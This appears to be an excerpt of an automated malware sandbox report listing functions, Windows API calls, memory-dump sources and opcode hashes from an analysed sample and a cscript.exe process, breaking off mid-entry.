APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
Instruction ID: b01ba6cf3436e3ac7ba59ad1e4c80d6b9cf1e4843ea3370bd1df8a4db748f34e
Opcode Fuzzy Hash: 95cdc35e99a254c2aded364cd106fd50a8e26a999ed31900c700e6dd24670211
Instruction Fuzzy Hash: EDE04FB12002046FDB10DF55DC84EE73769EF88350F018159F90C97281C935E8118BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00418520, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408C6C, Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 00408F8C

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 256f9c514b5ef7632a61cc85b0f2cfa842a2cb1def4758e2bd34ed65f77ce34d
Instruction ID: 0ff0364cf6be1368c5f4b291029ae6b5cbfe5ea2986cd3c38f085d2a96d73519
Opcode Fuzzy Hash: 256f9c514b5ef7632a61cc85b0f2cfa842a2cb1def4758e2bd34ed65f77ce34d
Instruction Fuzzy Hash: 06021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 00408C70, Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 00408F8C

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: f1d44c302487b103660306cd6987bb60b95c699b99aa7ff381766033f9a4755f
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 6E022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0041C58A, Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6761243c807f8599106f1ff6191d804287885db2ddfde14bc8d2be766b5794b
Instruction ID: 4156fa8b997677385276b44771148257f16ae5edc97a2b716fcf7a3cd11c15bc
Opcode Fuzzy Hash: a6761243c807f8599106f1ff6191d804287885db2ddfde14bc8d2be766b5794b
Instruction Fuzzy Hash: 7E812232848391DFEB05DF78E8966463FB1F746320708068ED9A25B1D2D77424BACF86

Uniqueness

Uniqueness Score: -1.00%

Function 00402D90, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 00402D88, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660dbcd9d4b525f84ec70345b48c30eb786b97a7a498ec4d560fc54d98703e81
Instruction ID: 9178a6781057fc96b23a6498efdafe696857250051c9cd61765f4f9f700f33a7
Opcode Fuzzy Hash: 660dbcd9d4b525f84ec70345b48c30eb786b97a7a498ec4d560fc54d98703e81
Instruction Fuzzy Hash: 3F5182B3E14A214BD318CE09CC40631B792FFC8312B5B81BEDD199B397CA74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 0041B8FB, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bf46696de6abd3ccb1d8624ddecd45027ed840a9774cc2ce9ff8440a1e8a6b3
Instruction ID: fc1872c2ed11fff5d620cbbd4c11b470343491c460d1f6761d842a8916d4cbe2
Opcode Fuzzy Hash: 3bf46696de6abd3ccb1d8624ddecd45027ed840a9774cc2ce9ff8440a1e8a6b3
Instruction Fuzzy Hash: C1617372818796CFD716CF38DA8A6823FF1F712324748824FD4A2A7496C7782556CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040102E, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d18f76931eec532c383dcf8885f4cbc52efa6621afacd448ea28532cd0a7bc9
Instruction ID: 61cd57d2072392fc7a97888852fd84d8bcbb586f46090e9864607dc025de2440
Opcode Fuzzy Hash: 1d18f76931eec532c383dcf8885f4cbc52efa6621afacd448ea28532cd0a7bc9
Instruction Fuzzy Hash: A831A0116587F14ED31E836D08B9675AEC18E9720174EC2FEDADA6F3F3C0888408D3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00401030, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5

Uniqueness

Uniqueness Score: -1.00%

Function 0041B57A, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18512cc22602838dbd03c0e1e7066ad10e8d7355b100ff0c0411712c92d1e501
Instruction ID: 361f27f1a81cd2c9f6af134fa7674f1d50b964825dd26805f452c38648ee03c4
Opcode Fuzzy Hash: 18512cc22602838dbd03c0e1e7066ad10e8d7355b100ff0c0411712c92d1e501
Instruction Fuzzy Hash: 1D4133739187A2CFD719DF38DA9A7813FB1F791320749834ECA9057092C738256ADB89

Uniqueness

Uniqueness Score: -1.00%

Function 00406A98, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce71f0b18b192eead0bdd58e6451f53a7d4a471ea843e5b1a893e27d91b5b14
Instruction ID: b04cdd777b13eb029ad178d631aa259a83c5c41265c149a7b635c52cc29cf17c
Opcode Fuzzy Hash: 3ce71f0b18b192eead0bdd58e6451f53a7d4a471ea843e5b1a893e27d91b5b14
Instruction Fuzzy Hash: DBC08C32D01A080BD6208D6CA9862B0FBB5E757270F40375FE80BE7254894AD4926248

Uniqueness

Uniqueness Score: -1.00%

Function 00415699, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e20c8c03abd7a7042ea1e45eea7a4d3f6bbaece8f5276b37b475447ada751d
Instruction ID: a99fd93fac32b6c5bd72fbc59389829e61a1defbd79046b1edcb9b2863031fe3
Opcode Fuzzy Hash: b0e20c8c03abd7a7042ea1e45eea7a4d3f6bbaece8f5276b37b475447ada751d
Instruction Fuzzy Hash: 04B0921BA868285500106C5E78800B9E3A4D8CB229E10F3978D1CB32002406C81E80D8

Uniqueness

Uniqueness Score: -1.00%

Function 00415852, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3511af067845206802aa604ab3289e8b3ce08807f0d58701d70e4a09b83e750c
Instruction ID: 6c37e1900271d968a9ebdac2dec6771b5c852c920dd60c45b272dc951f77e813
Opcode Fuzzy Hash: 3511af067845206802aa604ab3289e8b3ce08807f0d58701d70e4a09b83e750c
Instruction Fuzzy Hash: 6FA0023BF864545464581C8DBC616B6D334D1C307AE243273D71CF3400C007C025115C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cscript.exe PID: 6116 Parent PID: 3424 cscript.exeCOMMON

Executed Functions

Function 027881D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02783BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02783BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0278821D

Strings

.z`, xrefs: 0278820D, 02788218

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 9def8b8fdddccad44b986fa8820e7773f38d4079ecc20bf55ed7bff726910547
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: B3F0BDB2200208ABCB08DF89DC84EEB77ADAF8C754F158248BA0D97240D630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02788222, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02783BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02783BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0278821D

Strings

.z`, xrefs: 0278820D, 02788218

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
Instruction ID: 80916f884bc6bd04e8409e45bb85b0e26b759a4c427682a61acbdedfab404b22
Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
Instruction Fuzzy Hash: A5F0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7204C631E8028B65

Uniqueness

Uniqueness Score: -1.00%

Function 027883AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02772D11,00002000,00003000,00000004), ref: 027883E9

Strings

6HCU, xrefs: 027883AC

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 6HCU
API String ID: 2167126740-1255677348
Opcode ID: 5ca195d08c7bb1ddaf8ea49b38e0745b3ab2388370f426f41256d273ac7716ab
Instruction ID: 58d88d7290cf02a3d785608816ba014d07c23129e11955168a73af3b9d5176a5
Opcode Fuzzy Hash: 5ca195d08c7bb1ddaf8ea49b38e0745b3ab2388370f426f41256d273ac7716ab
Instruction Fuzzy Hash: DBF0F8B5200208ABCB14DF99CC85EEB77A9AF8C750F158149BE5897251D630E911CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02788280, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02783D62,5E972F59,FFFFFFFF,02783A21,?,?,02783D62,?,02783A21,FFFFFFFF,5E972F59,02783D62,?,00000000), ref: 027882C5

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 76c951263323dada35358eb006521befef303b2a14ed85bac790c2cc1cd3d224
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 31F0A4B2200208ABCB14DF89DC84EEB77ADAF8C754F158248BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 027883B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02772D11,00002000,00003000,00000004), ref: 027883E9

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 918cdf3d3bbce6c658969c919cf31684758789db72e6a4d44421e0b49cd7c329
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: ADF015B2200208ABCB14DF89CC84EAB77ADAF8C750F118148BE0897241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02788300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02783D40,?,?,02783D40,00000000,FFFFFFFF), ref: 02788325

Memory Dump Source

Source File: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 17a9fcc450ec68421232fb831f73c7eea0241cadb359cd1ffd592c9392c4541b
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 34D012752402186BD710EF99CC49F97775DEF48750F154455BA185B241D570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 047B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B986A

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00c25af6749c89b523f7455f70035bf495205d305c1593a633d922e4cc807482
Instruction ID: e77b979688f1feee50f5fec36fbc7cf681c60d56ffe5356ca6e197eb9435d00b
Opcode Fuzzy Hash: 00c25af6749c89b523f7455f70035bf495205d305c1593a633d922e4cc807482
Instruction Fuzzy Hash: 9190027120100417F23161594504707000997D4385F91C43AA04155A8D9696D956B161

Uniqueness

Uniqueness Score: -1.00%

Function 047B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B984A

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4fa3fe33db87e8b1155c966a349d59182bb1f10d5b5cd4691665ca562ae9f81
Instruction ID: 4f33af5d050b049c29169f031480c2242ccbf13e9cd98cdf982ee65a00bda5ee
Opcode Fuzzy Hash: d4fa3fe33db87e8b1155c966a349d59182bb1f10d5b5cd4691665ca562ae9f81
Instruction Fuzzy Hash: A2900261242041567665B15944045074006A7E4385791C03AA14059A0C8566E85AF661

Uniqueness

Uniqueness Score: -1.00%

Function 047B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B954A

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3effe4eb6e29522976444f54f26212e990d4b17d99a8ee6de5fcdcd0c6528b7e
Instruction ID: 8eeeab172788e2349b7d5cca996a8edc8268645d6ce0f33813dde3fc3ea2ea4b
Opcode Fuzzy Hash: 3effe4eb6e29522976444f54f26212e990d4b17d99a8ee6de5fcdcd0c6528b7e
Instruction Fuzzy Hash: F5900265211000072225A5590704507004697D9395351C039F10065A0CD661D8657161

Uniqueness

Uniqueness Score: -1.00%

Function 047B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B991A

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01051418792a5e0a9ee498ba04e718984275a21a6c6af7c93ae3ece6e045a404
Instruction ID: f5d6b897c64e1a5fb6e9eaf61557e18b5e21e70d2545d8467cef383f00e65518
Opcode Fuzzy Hash: 01051418792a5e0a9ee498ba04e718984275a21a6c6af7c93ae3ece6e045a404
Instruction Fuzzy Hash: F29002B120100406F26071594404746000597D4345F51C039A50555A4E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 047B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B95DA

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 91e8079fa14b1e9541cb403dfca58a2c14f5b6a5e09e99d87c60451fe5c58820
Instruction ID: d4ffcbddf5567a0ad05e0088a5a09573c7925b5221b713409962b18847dcf401
Opcode Fuzzy Hash: 91e8079fa14b1e9541cb403dfca58a2c14f5b6a5e09e99d87c60451fe5c58820
Instruction Fuzzy Hash: 369002A120200007622571594414616400A97E4345B51C039E10055E0DC565D8957165

Uniqueness

Uniqueness Score: -1.00%

Function 047B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B99AA

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e42f135b1bf86386c5c3d7f41aebfc538b495ced4e1691fd485fa03a807888d8
Instruction ID: 5a8412f7eb02f746a936e595757ed8cf730d8cabeea359221aa7f96aa2213bbd
Opcode Fuzzy Hash: e42f135b1bf86386c5c3d7f41aebfc538b495ced4e1691fd485fa03a807888d8
Instruction Fuzzy Hash: 939002A134100446F22061594414B060005D7E5345F51C03DE10555A4D8659DC567166

Uniqueness

Uniqueness Score: -1.00%

Function 047B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B966A

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b69ca82761dcde6467096ba7509e431e72b2aa9c1221265620ae7c5ca1273a2c
Instruction ID: e2ebc6d13ddd2c3555b0d5b6ace76b16ab4ce6502b7bdddd9427041e2d62a840
Opcode Fuzzy Hash: b69ca82761dcde6467096ba7509e431e72b2aa9c1221265620ae7c5ca1273a2c
Instruction Fuzzy Hash: 6790027120100806F2A07159440464A000597D5345F91C03DA00166A4DCA55DA5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 047B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B9A5A

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa58a9ea7d27bb649e054266c03b5815b89e2e669210cf878f68f5de5b9abfb4
Instruction ID: a66bb52d8059167851a82df7aa4dace64d3b0e92559b231d9871f75b2129f7b8
Opcode Fuzzy Hash: fa58a9ea7d27bb649e054266c03b5815b89e2e669210cf878f68f5de5b9abfb4
Instruction Fuzzy Hash: 6A90026121180046F32065694C14B07000597D4347F51C13DA01455A4CC955D8657561

Uniqueness

Uniqueness Score: -1.00%

Function 047B9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B965A

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cdcd8d0244fdd1a29821718e01b3064bb792e82d92a7ac5fbe4eafa21fad8e4c
Instruction ID: e2e659e8be762d2ef066e00ee404ecb686c7345785f027bb2597cbe02a6b9e1f
Opcode Fuzzy Hash: cdcd8d0244fdd1a29821718e01b3064bb792e82d92a7ac5fbe4eafa21fad8e4c
Instruction Fuzzy Hash: 7190027120504846F26071594404A46001597D4349F51C039A00556E4D9665DD59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 047B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B96EA

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12f35ea6544bb0a5e21d2814312e2a62e02a261673e83c16b96961b14fcf0ff0
Instruction ID: 69e44f6e7817ab99bfd65daee97e561c2abcdafa27927e0766b356fc56997998
Opcode Fuzzy Hash: 12f35ea6544bb0a5e21d2814312e2a62e02a261673e83c16b96961b14fcf0ff0
Instruction Fuzzy Hash: B590027120108806F2306159840474A000597D4345F55C439A44156A8D86D5D8957161

Uniqueness

Uniqueness Score: -1.00%

Function 047B96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B96DA

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: afec0b7b4e418dfff8833b4baa3d8fdddfaef65b9a915050b3a76f04e7b8716a
Instruction ID: 3c2d8747ff6214a4a5484eb0a2b47070ed965d269f0c072d0aa4274c7b6b05e9
Opcode Fuzzy Hash: afec0b7b4e418dfff8833b4baa3d8fdddfaef65b9a915050b3a76f04e7b8716a
Instruction Fuzzy Hash: 3390027120100846F22061594404B46000597E4345F51C03EA01156A4D8655D8557561

Uniqueness

Uniqueness Score: -1.00%

Function 047B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B971A

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1442d9db6974fb48e970959a9e1f81ff37497a2f4d8a8f9b0a49329c0a5caae7
Instruction ID: 6989424da6f28c5472c0dacbf2ac913bffd7981ab99aff1d4b6c18d6d19873ab
Opcode Fuzzy Hash: 1442d9db6974fb48e970959a9e1f81ff37497a2f4d8a8f9b0a49329c0a5caae7
Instruction Fuzzy Hash: 4890027120100406F22065995408646000597E4345F51D039A50155A5EC6A5D8957171

Uniqueness

Uniqueness Score: -1.00%

Function 047B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B9FEA

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0a42f36252e33139bc4303175da588a79b8875d14e7f8444dba93a8f6c64862
Instruction ID: 7551ae081f286ee279f1efb6b8fea765a1a778bc881579e7c25a21876e51fabe
Opcode Fuzzy Hash: c0a42f36252e33139bc4303175da588a79b8875d14e7f8444dba93a8f6c64862
Instruction Fuzzy Hash: C990027131114406F23061598404706000597D5345F51C439A08155A8D86D5D8957162

Uniqueness

Uniqueness Score: -1.00%

Function 047B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047B978A

Memory Dump Source

Source File: 00000009.00000002.917744839.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true

Associated: 00000009.00000002.917897219.000000000486B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
